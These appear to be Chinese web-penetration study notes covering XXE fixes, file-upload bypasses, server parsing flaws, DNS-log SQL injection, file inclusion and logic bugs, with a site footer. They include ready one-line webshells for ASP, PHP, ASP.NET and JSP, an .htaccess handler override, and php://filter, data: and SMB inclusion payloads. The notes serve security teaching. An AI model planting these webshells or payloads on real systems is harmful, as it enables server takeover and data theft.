XXE修補(bǔ)漏洞方案一、使用開(kāi)發(fā)語(yǔ)言提供的【禁用外部實(shí)體】PHP:libxml_disable_entity_loader(true);JAVA:DocumentBuilderFactorydbf=DocumentBuilderFactory.newInstance();dbf.setExpandEntityReferences(false);Python:fromlxmlimportetreexmlData=etree.parse(xmlSource,etree.XMLParser(resolve_entities=False))方案二、過(guò)濾用戶提交的XML數(shù)據(jù)關(guān)鍵詞:<!DOCTYPE和<!ENTITY,或者,SYSTEM和PUBLIC。libxml2.9.1及以后,默認(rèn)不解析外部實(shí)體WEBSHELLasp:<%execute(request("cmd"))%>Php:<?phpeval($_POST[cmd]);?>ASP.NET:<%@PageLanguage="Jscript"%><%Response.Write(eval(Request.Item["z"],"unsafe"));%>Jsp:<%if(request.getParameter("f")!=null)(newjava.io.FileOutputStream(application.getRealPath("/")+request.getParameter("f"))).write(request.getParameter("t").getBytes());%>空字節(jié)理解當(dāng)字符串有%00(空字節(jié)),就會(huì)被服務(wù)器似作為結(jié)束符。基本流程1.圖片是否正常上傳2.圖片上傳內(nèi)容是否被感染(內(nèi)容替換)3.上傳的域名是否是目標(biāo)服務(wù)器3.1如果不是那么判斷圖片服務(wù)器是否解析(phpaspaspxjspcfmshtml等)4.上傳的目錄是否支持解析(phpaspaspxjspcfmshtml等)5.判斷是否黑白名單驗(yàn)證文件上傳之JS驗(yàn)證繞過(guò)JS即可。文件上傳空字節(jié)截?cái)嗌蟼魑募蟼骱诿麊悟?yàn)證白名單驗(yàn)證:只能允許某某某上傳黑名單驗(yàn)證:不能允許某某某上傳可以嘗試php3php4php5,phtml或者使用服務(wù)解析漏洞等文件二次上傳看原理。。。。。演示完看FCK案例。文件上傳分析根據(jù)文件名或者路徑判斷代碼。mime類型MIME(MultipurposeInternetMailExtensions)多用途互聯(lián)網(wǎng)郵件擴(kuò)展類型。是設(shè)定某種擴(kuò)展名的文件用一種應(yīng)用程序來(lái)打開(kāi)的方式類型,當(dāng)該擴(kuò)展名文件被訪問(wèn)的時(shí)候,瀏覽器會(huì)自動(dòng)使用指定應(yīng)用程序來(lái)打開(kāi)。多用于指定一些客戶端自定義的文件名,以及一些媒體文件打開(kāi)方式。每個(gè)MIME類型由兩部分組成,前面是數(shù)據(jù)的大類別,例如聲音audio、圖象image等,后面定義具體的種類。常見(jiàn)的MIME類型(通用型):超文本標(biāo)記語(yǔ)言文本.htmltext/htmlxml文檔.xmltext/xmlXHTML文檔.xhtmlapplication/xhtml+xml普通文本.txttext/plainRTF文本.rtfapplication/rtfPDF文檔

.pdfapplication/pdfMicrosoftWord文件

.wordapplication/msword圖片.jpg:image/jpegIis解析漏洞使用iis5.x-6.x版本的服務(wù)器,大多為windowsserver2003,網(wǎng)站比較古老,開(kāi)發(fā)語(yǔ)句一般為asp;該解析漏洞也只能解析asp文件,而不能解析aspx文件。目錄解析(6.0)形式:

原理:服務(wù)器默認(rèn)會(huì)把.asp,.asa目錄下的文件都解析成asp文件。文件解析形式:

原理:服務(wù)器默認(rèn)不解析;號(hào)后面的內(nèi)容,因此xx.asp;.jpg便被解析成asp文件了。解析文件類型IIS6.0默認(rèn)的可執(zhí)行文件除了asp還包含這三種:/test.asa

/test.cer

/test.cdxapache解析漏洞漏洞原理

Apache解析文件的規(guī)則是從右到左開(kāi)始判斷解析,如果后綴名為不可識(shí)別文件解析,就再往左判斷。比如test.php.owf.rar“.owf”和”.rar”這兩種后綴是apache不可識(shí)別解析,apache就會(huì)把wooyun.php.owf.rar解析成php。漏洞形式

其余配置問(wèn)題導(dǎo)致漏洞(1)如果在Apache的conf里有這樣一行配置AddHandlerphp5-script.php這時(shí)只要文件名里包含.php即使文件名是test2.php.jpg也會(huì)以php來(lái)執(zhí)行。

(2)如果在Apache的conf里有這樣一行配置AddTypeapplication/x-httpd-php.jpg即使擴(kuò)展名是jpg,一樣能以php方式執(zhí)行。nginx解析漏洞

漏洞原理

Nginx默認(rèn)是以CGI的方式支持PHP解析的,普遍的做法是在Nginx配置文件中通過(guò)正則匹配設(shè)置SCRIPT_FILENAME。當(dāng)訪問(wèn)這個(gè)URL時(shí),$fastcgi_script_name會(huì)被設(shè)置為“phpinfo.jpg/1.php”,然后構(gòu)造成SCRIPT_FILENAME傳遞給PHPCGI,但是PHP為什么會(huì)接受這樣的參數(shù),并將phpinfo.jpg作為PHP文件解析呢?這就要說(shuō)到fix_pathinfo這個(gè)選項(xiàng)了。如果開(kāi)啟了這個(gè)選項(xiàng),那么就會(huì)觸發(fā)在PHP中的如下邏輯:PHP會(huì)認(rèn)為SCRIPT_FILENAME是phpinfo.jpg,而1.php是PATH_INFO,所以就會(huì)將phpinfo.jpg作為PHP文件來(lái)解析了漏洞形式

IIS7.5解析漏洞IIS7.5的漏洞與nginx的類似,都是由于php配置文件中,開(kāi)啟了cgi.fix_pathinfo,而這并不是nginx或者iis7.5本身的漏洞。PS:

a.aspx.a;.a.aspx.jpg..jpg.net上傳一般支持ASPX默認(rèn)都會(huì)支持ashxphtml上傳在apache配置文件(一般是httpd.conf)里添加

AddTypeapplication/x-httpd-php.phtml這樣phtml后綴的文件就會(huì)按照php去解析,也可以設(shè)置成其他后綴

.htaccess上傳<Files*.jpg>ForceTypeapplication/x-httpd-phpSetHandlerapplication/x-httpd-php</Files>雙文件上傳找已知上傳漏洞什么是DNS?Sql注入利用DNS注入的原理

dns指向src2.ccSrc2.cc是DNS服務(wù)器DNS在解析的時(shí)候會(huì)留下日志簡(jiǎn)單來(lái)說(shuō)就是把信息放在高級(jí)域名中,傳遞到自己這,然后讀取日志,獲取信息。Sql注入利用DNS注入showvariableslike"skip_name_resolve%";mid(str,1,3)字符串截取ORD()轉(zhuǎn)換成ascii碼Length()統(tǒng)計(jì)字節(jié)長(zhǎng)度version()是查看數(shù)據(jù)庫(kù)版本

database()查看數(shù)據(jù)庫(kù)名user()查看當(dāng)前用戶HEX()十六進(jìn)制load_file()文件包含原理客戶端提交過(guò)去,服務(wù)端進(jìn)行包含文件包含之日志包含得知Apache日志使用包含文件包含之截?cái)喟褂每兆止?jié)利用PHP協(xié)議包含我們都知道FTPhttpfile協(xié)議。那么同理。http超文本傳輸協(xié)議File協(xié)議本地文件傳輸協(xié)議那么php協(xié)議就是輸入/輸出流比如:$file_in=file_get_contents("php://input");開(kāi)啟PHP協(xié)議必須要allow_url_include&&allow_url_fopen為On才可以遠(yuǎn)程文件包含

條件:allow_url_include&&allow_url_fopen為On才可以smb協(xié)議包含之前說(shuō)FTPhttpfile協(xié)議包含都可以SMB也不例外。\\src2.cc\d\1.txt利用data協(xié)議包含data:text/plain,<?phpechophpinfo();?>PHP輸入輸出流php://filter/convert.base64-encode/resource=./demo2.php文件讀取或下載原理客戶端提交過(guò)去,服務(wù)端進(jìn)行讀取,類似于SSRF。文件讀取攻擊思路結(jié)合文件包含即可(大部分)PHP代碼執(zhí)行eval()

preg_replace()create_function()assert() array_map()call_user_func()/call_user_func_array()array_filter()usort()、uasort()$_GET['a']($_GET['b']);相關(guān)文章:PHP命令執(zhí)行exec()、system()、popen()、passthru()、proc_open()、pcntl_exec()、shell_exec()、反引號(hào)`實(shí)際上是使用shell_exec()函數(shù)PHP反序列化漏洞什么是反序列化?比如一個(gè)數(shù)組轉(zhuǎn)換成字符串那么就需要序列化,然后變成字符串原理相同,反序列化的意思是講字符串變成數(shù)組一些反序列化的文章

一些遠(yuǎn)程代碼執(zhí)行的漏洞遠(yuǎn)程代碼漏洞存在的CMS或者一些知名的框架很多。。比如struts2等。什么是設(shè)計(jì)缺陷-邏輯錯(cuò)誤?某些功能比如提現(xiàn)密碼重置未授權(quán)訪問(wèn)驗(yàn)證碼未刷新等。。。簡(jiǎn)單一句話就是某種功能存在bug。密碼重置漏洞怎么找這種漏洞?這個(gè)得看個(gè)人經(jīng)驗(yàn),以及分析經(jīng)驗(yàn)。如果你想學(xué)就多看看密碼找回的漏洞。這種漏洞的檢測(cè)技巧是千變?nèi)f化。密碼重置分很多種方法比較常見(jiàn)的有驗(yàn)證碼驗(yàn)證,郵箱發(fā)送,回答密保問(wèn)題等。。。。密碼重置挖掘看了許多文章,結(jié)合你的思路,并且結(jié)合你的編程能力,進(jìn)行挖掘。提現(xiàn)漏洞怎么找這種漏洞?這個(gè)得看個(gè)人經(jīng)驗(yàn),以及分析經(jīng)驗(yàn)。如果你想學(xué)就多看看提現(xiàn)漏洞的過(guò)程。這種漏洞的檢測(cè)技巧也是千變?nèi)f化??戳嗽S多文章,然后結(jié)合你的思路,并且結(jié)合你的編程能力,進(jìn)行挖掘。驗(yàn)證碼漏洞分兩種:1.驗(yàn)證碼輸入對(duì)沒(méi)有進(jìn)行一個(gè)刷新。2.驗(yàn)證碼可識(shí)別怎么修補(bǔ)邏輯漏洞?這個(gè)修補(bǔ)思路不是死的,關(guān)鍵的看他功能是怎么實(shí)現(xiàn)的,才能提供修補(bǔ)思路比如郵箱發(fā)送之后重置又比如驗(yàn)證碼發(fā)送。。。。驗(yàn)證與授權(quán)的過(guò)程驗(yàn)證跟授權(quán)不是一個(gè)意思。別搞錯(cuò)了。未授權(quán)訪問(wèn)漏洞說(shuō)白了就是不需要驗(yàn)證授權(quán)你就可以直接訪問(wèn)那個(gè)頁(yè)面(那個(gè)頁(yè)面必須要有功能給你操作或敏感信息輸出給你才可以叫做未授權(quán)訪問(wèn)漏洞)未授權(quán)操作漏洞跟未授權(quán)訪問(wèn)漏洞基本一個(gè)意思,未授權(quán)訪問(wèn)提供頁(yè)面提供功能輸出給你,而未授權(quán)操作是只能看到操作信息或沒(méi)有操作信息、越權(quán)什么是信息泄露?暴露了一些信息比如路徑泄露CMS泄露服務(wù)器類型泄露一些日志泄露可提供思路給黑客進(jìn)行一個(gè)滲透才叫信息泄露路徑泄露存在SQL注入Google用法

#用于收集子域名

不要輸入WWWintitle:管理登錄filetype:php

#標(biāo)題中帶有管理登錄并且還是PHP語(yǔ)言的inurl:login.php#只要URL包含了login.php都會(huì)列出intext#正文中存在關(guān)鍵字的頁(yè)面intitle#標(biāo)題中存在的關(guān)鍵字網(wǎng)頁(yè)info#一些基本信息inurl#URL存在關(guān)鍵字的網(wǎng)頁(yè)filetype#搜索指定文件類型找網(wǎng)站路徑答:方法很多多到說(shuō)不完。。判斷網(wǎng)站CMS。1.判斷的網(wǎng)站使用了什么CMS或框架。2.判斷是私人開(kāi)發(fā)的還是購(gòu)買了CMS的源碼還是用了免費(fèi)開(kāi)源的CMS的

溫馨提示

  • 1. 本站所有資源如無(wú)特殊說(shuō)明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請(qǐng)下載最新的WinRAR軟件解壓。
  • 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請(qǐng)聯(lián)系上傳者。文件的所有權(quán)益歸上傳用戶所有。
  • 3. 本站RAR壓縮包中若帶圖紙,網(wǎng)頁(yè)內(nèi)容里面會(huì)有圖紙預(yù)覽,若沒(méi)有圖紙預(yù)覽就沒(méi)有圖紙。
  • 4. 未經(jīng)權(quán)益所有人同意不得將文件中的內(nèi)容挪作商業(yè)或盈利用途。
  • 5. 人人文庫(kù)網(wǎng)僅提供信息存儲(chǔ)空間,僅對(duì)用戶上傳內(nèi)容的表現(xiàn)方式做保護(hù)處理,對(duì)用戶上傳分享的文檔內(nèi)容本身不做任何修改或編輯,并不能對(duì)任何下載內(nèi)容負(fù)責(zé)。
  • 6. 下載文件中如有侵權(quán)或不適當(dāng)內(nèi)容,請(qǐng)與我們聯(lián)系,我們立即糾正。
  • 7. 本站不保證下載資源的準(zhǔn)確性、安全性和完整性, 同時(shí)也不承擔(dān)用戶因使用這些下載資源對(duì)自己和他人造成任何形式的傷害或損失。

最新文檔

評(píng)論

0/150

提交評(píng)論